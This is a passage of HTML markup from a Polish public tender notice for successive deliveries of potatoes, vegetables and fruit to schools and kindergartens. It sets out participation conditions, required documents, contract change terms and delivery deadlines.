id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zamówienie będzie realizowane od dnia zawarcia umowy jednak nie wcześniej jak od 02.01.2020 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Należyte wykonanie/wykonywanie (w przypadku dostaw okresowych lub ciągłych) przez Wykonawcę w okresie ostatnich trzech lat przynajmniej dwóch zamówień obejmujących asortyment objęty wskazanym w zamówieniu,- każde w cenie minimum : Część nr 1 - 60 000,00 zł, Część nr 2 – 40 000,00 zł, Część nr 3 – 15 000,00 zł, Część nr 4 – 7 000,00 zł</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">W przypadku, gdy jakakolwiek wartość dotycząca wymaganej wyrażona będzie w walucie obcej Wykonawca dokona przeliczenia jej wartości na PLN na podstawie średniego kursu złotego w stosunku do tej waluty obcej określonego w Tabeli Kursów Narodowego Banku Polskiego. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polegać na zdolności zawodowej innych podmiotów. Poleganie na zdolności zawodowej może nastąpić niezależnie od charakteru prawnego łączących Wykonawcę z podmiotem stosunków prawnych. Jeżeli zdolności zawodowe, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:a) zastąpił ten podmiot innym podmiotem lub podmiotami lubb) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zawodowe, o których mowa.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp – z datą wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentu składa dokument wystawiony w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Daty wystawienia dokumentu lub oświadczenia jak dla odpisu - tj. nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.2. Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w zakresie art. 24 ust. 1 pkt 23 ustawy Pzp,</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W zakresie posiadania zdolności zawodowej – wykaz wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca, który polega na zasobach innych podmiotów, w celu wykazania spełnienia warunków w postępowaniu zamieszcza informacje o tych zasobach i podmiotach w oświadczeniu. Zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów jw. (wg wzoru będącego załącznikiem nr 4 do SIWZ) na potrzeby realizacji zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający zastrzega możliwość zmian postanowień umów w stosunku do treści oferty w zakresie:Zmiany wartości wynagrodzenia Wykonawcy wynikającej ze zmian:1) stawek podatku od towarów i usług,2) zakończenie produkcji lub wystąpienie braku na rynku niektórych zamówionych produktów -co spowoduje konieczność wprowadzenia dostaw produktów podobnych w ich miejsce.Zmian ewentualnych umów z Podwykonawcami dotyczących:1) powierzenia realizacji zamówienia Podwykonawcom, mimo nie wskazania w ofercie takiej części do powierzenia podwykonawcom,2) innego zakresu podwykonawstwa, niż przedstawiony w ofercie;3) wprowadzenia innych Podwykonawców niż przedstawieni w ofercie;4) rezygnacji z podwykonawstwa,z zapewnieniem spełnienia warunków z art. 22 ust.1.ustawy Pzp, w przypadku z korzystania przez Wykonawcę z ich zasobów.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-12-04</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferty muszą być sporządzone w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Ziemniaki, warzywa i owoce (surowe)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są sukcesywne dostawy ziemniaków warzyw, owoców, ziół i przypraw świeżych w terminach:- 3 razy w tygodniu (dni wg wskazań Zamawiających) - w godzinach 7.00 – 8.00, za wyjątkiem: agrest, porzeczka czerwona, figi świeże, kaki, kukurydza kolba, liczi, marchewka mini, pitaja, pomidor koktajlowy żółty, sałata rzymska, Melon kantalupa - o pomarańczowym miąższu, Melon galia, Mandarynka - Tangerynka, Pomarańcza deserowa - odmiany Hamlin (bezpestkowa), Washington Nawel (pomarańcza z pępkiem), Salustiana, Gruszka DESEROWA - odmiany - BERA HARDY, Gruszka DESEROWA - odmiany - BERA HARDY, Gruszka deserowa – FAWORYTKA, Papryka BIAŁA, Marchewka SŁODKA, DESEROWA – KAMILIA, Gruszka RED Faworytka, Czerowna Klapsa, Jabłka – koszela, Grajpfrut CZERWONY - które będą dostarczane tylko w terminach uzgodnionych z dostawcą (w tych samych godzinach).Bieżące ww. sukcesywne dostawy będą zgłaszane nie później niż w dniu poprzedzającym dostawę, przez upoważnionych przedstawicieli Zamawiających. Zamówienia będą zgłaszane w formie faksu, maila lub pisemnie i dodatkowo potwierdzane telefonicznie.Dostawy dokonywane będą w dni robocze: w szkołach w okresach prowadzenia nauki, w przedszkolach - średnio przez 10 miesięcy edukacji przedszkolnej i jednego miesiąca wakacyjnego.Zamawiana żywność musi spełniać wymagania w zakresie obowiązujących przepisów prawa żywnościowego, zgodnie z poniższymi aktami prawnymi:1) ustawa z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. tj. z 2018 roku, poz. 1541 z późn. zmianami) wraz z aktami wykonawczymi,2) ustawa z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz. U. tj. z 2017 roku, poz. 242 z późn. zmianami) wraz z aktami wykonawczymi,3) ustawa z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. tj. z 2018 roku, poz. 2164) wraz z aktami wykonawczymi:4) Rozporządzenie Ministra Rolnictwa i Rozwoju Wsi - w sprawie znakowania poszczególnych rodzajów środków spożywczych ( 